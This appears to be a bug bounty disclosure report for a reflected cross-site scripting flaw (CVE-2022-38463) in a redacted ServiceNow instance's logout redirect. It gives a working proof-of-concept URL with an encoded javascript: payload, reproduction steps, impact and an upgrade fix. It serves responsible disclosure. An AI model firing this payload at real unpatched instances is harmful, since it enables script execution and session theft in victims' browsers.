XSS in ServiceNow logout https://████:443

**Description:** XSS in ServiceNow logout https://██████:443/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain) ## References https://nvd.nist.gov/vuln/detail/CVE-2022-38463 ## Impact Unauthenticated remote attacker can execute code in user's browser context. User must click on malicious link ## System Host(s) ███████ ## Affected Product(s) and Version(s) Servicenow prior to SanDiego SP6 ## CVE Numbers CVE-2022-38463 ## Steps to Reproduce Click on https://█████:443/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain) ## Suggested Mitigation/Remediation Actions Upgrade to patched version of ServiceNow